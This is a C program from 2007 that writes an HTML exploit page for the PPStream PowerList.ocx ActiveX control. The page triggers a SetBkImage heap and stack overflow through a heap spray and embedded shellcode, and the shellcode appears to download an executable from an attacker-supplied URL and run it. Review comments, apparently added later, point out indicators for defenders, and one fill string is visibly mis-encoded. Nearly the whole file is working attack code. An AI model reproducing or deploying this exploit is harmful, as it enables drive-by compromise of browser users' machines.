/*
PPStream
PowerList.ocx
2.1.6.2916
描述:
SetBkImage 堆和栈溢出, 还是以前的老问题。以前补的是PowerPlayer.dll中的
这里利用堆溢出和栈溢出,使用 CFindFile 对参数检查不严格,导致堆溢出。
在其析构时会导致异常,并且在析构之前发生了 strcat 导致栈溢出,覆盖掉
原来的 seh 处理程序
author: [email protected]
2007-11-11
*/
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
/*
 * Raw payload bytes that main() copies into the generated page as %u escapes.
 * The array is treated as opaque here; the only things visible without
 * decoding it are the ASCII runs "URLMON" and "c:\c.exe" among the bytes.
 * NOTE(review): those strings suggest a download-and-execute stub that is
 * completed by the URL main() appends after the array, but that is an
 * assumption -- the bytes are not decoded in this file. For a defender the
 * dropped path and the URLMON string are the host/network indicators to
 * watch for when triaging a page that carries this payload.
 */
const unsigned char shellcode[174] =
{
// Must be an even number of bytes: main() emits the array two bytes at a
// time as one "%uXXXX" escape (low byte first) and reads shellcode[i + 1],
// so an odd length would read one byte past the end. 174 is even.
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};
/*
 * HTML/JavaScript wrapper written around the encoded payload. script1
 * instantiates the control through the CLSID on the <object> tag and opens
 * the JavaScript string literal that main() fills with %u-encoded bytes;
 * script2 closes that literal and carries the rest of the page. The
 * backslash-quote sequences throughout appear to be escaping added when
 * this listing was extracted, not part of the program text.
 *
 * Defender notes, all visible in the strings below: a fill block doubled
 * up to 0x30000 code units and copied 400 times together with the payload
 * (a heap-spray shape), and a string of repeated \x0a grown past 300 bytes
 * before being handed to SetBkImage. Both are usable as content signatures,
 * and a kill bit on this CLSID keeps the browser from loading the control
 * at all.
 */
const char* script1 = \\
\"<html><body><object id=\\\"ppc\\\" classid=\\\"clsid:20C2C286-BDE8-441B-B73D-AFA22D914DA5\\\"></object><script>\"
\"var shellcode = unescape(\\\"\";
const char* script2 = \\
\"\\\");\"
// NOTE(review): the fill literal "%u9090邐" looks mis-encoded in this copy
// (the trailing character is presumably a second %u escape that was
// garbled); kept byte-for-byte since it is program text.
\"fillblock = unescape(\\\"%u9090邐\\\");\"
\"while ( fillblock.length < 0x30000 ) fillblock += fillblock;\"
\"memory = new Array();\"
\"for ( x = 0; x < 400; x++ ) memory[x] = fillblock + shellcode;\"
\"var buffer = \'\\\\x0a\\\\x0a\\\\x0a\\\\x0a\';\"
\"while (buffer.length < 300) buffer += \'\\\\x0a\\\\x0a\\\\x0a\\\\x0a\';\"
\"ppc.SetBkImage(buffer);\"
\"</script>\"
\"</body>\"
\"</html>\"
// The three closing tags below duplicate the ones just above; browsers
// tolerate the redundancy but the generated page is not well-formed.
\"</script>\"
\"</body>\"
\"</html>\";
/*
 * Entry point: writes the page "fuckpps.html" into the current directory.
 * argv[1] is a URL that is appended to the payload as %u-encoded byte pairs;
 * no other validation of the argument is performed.
 * Returns 0 on success, -1 on a usage error, -2 if the file cannot be opened.
 */
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf(\"ex:fuckpps url\\nwritten by [email protected] (2007)\\n\");
return -1;
}
FILE *file = fopen(\"fuckpps.html\", \"w+\");
if ( file == NULL )
{
printf(\"create \'fuckpps.html\' failed!\\n\");
return -2;
}
fprintf(file, \"%s\", script1);
// Payload bytes go out two at a time as one "%uXXXX" escape, low byte
// first, i.e. each pair becomes one little-endian 16-bit code unit.
// sizeof (shellcode) is 174, so i + 1 never runs past the array.
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, \"%%u%02X%02X\" , shellcode[i + 1], shellcode[i]);
const unsigned l = strlen(argv[1]);
// Same pairing for the URL. For odd l the final pair reads argv[1][l],
// which is the NUL terminator, so the access stays in bounds.
// NOTE(review): argv[1][j] is a plain char, which may be signed; %02X
// expects an unsigned value, so a byte >= 0x80 would print sign-extended
// (eight hex digits) instead of two -- the cheat-sheet fix is a cast to
// unsigned char, left as-is here.
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, \"%%u%02X%02X\" , argv[1][j + 1], argv[1][j]);
fprintf(file, \"%s\", script2);
// fclose flushes the buffered output; its return value is not checked, so
// a failed final write would still report success below.
fclose(file);
printf(\"make \'fuckpps.html\' successed!\\n\");
return 0;
}